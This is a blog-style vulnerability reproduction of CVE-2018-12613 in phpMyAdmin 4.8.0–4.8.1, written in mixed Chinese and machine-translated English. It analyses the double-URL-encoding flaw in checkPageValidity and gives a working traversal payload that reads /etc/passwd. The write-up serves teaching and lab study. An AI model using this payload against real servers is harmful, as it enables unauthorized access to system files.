当前位置:网站首页>[Vulnerability reproduction] CVE-2018-12613 (remote file inclusion)
[Vulnerability reproduction] CVE-2018-12613 (remote file inclusion)
2022-08-09 08:41:00 【z.volcano】
受影响版本
phpMyAdmin 4.8.0和4.8.1
环境
https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
下载源码后,可以配合phpstudy在本地搭建环境,我这里直接在BUUOJ里现有的环境做的
漏洞分析
在这段代码中,five in a rowif判断语句
if (! empty($_REQUEST['target']) #target参数不能为空
&& is_string($_REQUEST['target']) #targetThe value passed in the parameter must be a string
&& ! preg_match('/^index/', $_REQUEST['target']) #targetThe passed in value cannot start with index开头
&& ! in_array($_REQUEST['target'], $target_blacklist) #targetThe incoming value cannot contain in$target_blacklistsomething that appears within
&& Core::checkPageValidity($_REQUEST['target'])
) {
include $_REQUEST['target'];
exit;
这里是$_REQUEST
,post方法和get方法都支持
mentioned in the penultimate judgment$target_blacklist
,本质上是一个黑名单,Limit incoming content
$target_blacklist = array (
'import.php', 'export.php'
);
The last judgmentcheckPageValidity
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
#如果$whitelist为空,则引用$goto_whitelist
$whitelist = self::$goto_whitelist;
}
if (! isset($page) || !is_string($page)) {
#如果$page没有被定义,或者$page不是字符串,则返回false
return false;
}
if (in_array($page, $whitelist)) {
#如果$page有$whitelist中的某个值,则返回true
return true;
}
$_page = mb_substr( #$_page截取$pageThe value before the parameter is passed,如$page=index.php?a=123,则$_page=index.php
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
#如果$_page有$whitelist中的某个值,则返回true
return true;
}
$_page = urldecode($page); #突破点
$_page = mb_substr( #$_page截取$_pageThe value before the parameter is passed
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
##如果$_page有$whitelist中的某个值,则返回true
return true;
}
return false;
}
这里in_array($page, $whitelist)
Executed four times before and after,比较有意思的是,If the match is successful it will be返回true,但是匹配不成功不会返回false,This is also for the rear constructionpayload提供了可能性.
突破点在$_page = urldecode($page);
,如果我们构造,使得decodeOne appeared later?
,那么之后截取$_pageThe value before the parameter is passed(即?
之前的内容),就可以利用了
漏洞利用
?target=db_sql.php%253f/../../../../../../../../etc/passwd
因为`%253f`二次url解码后是`?`,整体变成
?target=db_sql.php?/../../../../../../../../etc/passwd
截取之后的$_page
是db_sql.php
,在$whitelist
中,满足条件,返回true
Directory traversal succeeded
边栏推荐
猜你喜欢
路由配置转发及实验
EMQ X 消息服务器学习记录——为后面的毕设做准备
leetcode 36. 有效的数独(模拟题)
文件处理(IO)
+ 6000 words, help you understand the Internet architecture evolution.
leetcode 33. 搜索旋转排序数组 (二分经典题)
[MySQL]mysql: Solve the problem of [Err] 1093 - You can't specify target table 'table name' for update in FROM clause
【redis】redis之过期监听
基于appinventor与EasyDL物体检测API的物体检测app
账号和权限管理
随机推荐
Venture DAO 行业研报:宏观和经典案例分析、模式总结、未来建议
ctf misc picture questions knowledge points
leetcode 34. 在排序数组中查找元素的第一个和最后一个位置(二分经典题)
OSI网络模型
Introduction to the Endpoint
零搜索量的关键词,你需要布局吗?
Process synchronization and mutual exclusion problem
QT program generates independent exe program (pit-avoiding version)
OpenHarmony Light Smart Product Development Live Notes
【CNN】2022 ECCV 对比视觉Transformer的在线持续学习
100句话,是否会触动你?
System Security and Application
【CNN】2022 ECCV Oral 自反馈学习的mixup训练框架AutoMix
编程洗衣机:字符串输出后的乱码
[Vulnerability reproduction] CVE-2018-7490 (path traversal)
【GNN终身学习】2022 CVPR 终身图学习
UE4 RTS 框选功能实现
鸿蒙开发实战一——手表篇
解决iframe跳转时父页面仍然存在的问题
scp upload file to remote server